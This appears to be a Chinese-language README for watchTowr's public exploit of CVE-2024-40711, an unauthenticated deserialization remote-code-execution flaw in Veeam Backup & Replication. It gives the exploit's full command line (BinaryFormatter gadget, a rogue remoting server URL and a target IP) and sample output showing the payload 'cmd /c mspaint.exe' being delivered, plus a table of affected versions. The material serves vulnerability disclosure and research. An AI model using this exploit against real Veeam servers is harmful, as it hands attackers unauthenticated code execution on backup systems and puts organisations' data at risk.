Veeam Backup & Replication 预认证反序列化漏洞 CVE-2024-40711 的利用程序
技术细节请参阅我们的博客文章
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
该漏洞由 CODE WHITE GmbH(@codewhitesec)的 Florian Hauser(@frycos)发现。请务必关注他出色的研究,我们的角色仅是重现并为该问题开发利用程序。
| 版本 | 状态 |
|---|---|
| 12.2.0.334 | 已完全修补。不受本博文中所述漏洞的影响。 |
| 12.1.2.172 | 受影响,但利用需要身份验证。低权限用户可以执行任意代码。 |
| 12.1.1.56 及更早版本 | 容易受到未认证 RCE 的攻击。 |
该利用程序由 watchTowr (@watchtowrcyber) 的 Sina Kheirkhah (@SinSinology) 编写。
我们还要借此机会感谢 Soroush Dalili 在编写该利用程序时提供的帮助。
如需获取最新安全研究,请关注 watchTowr 实验室团队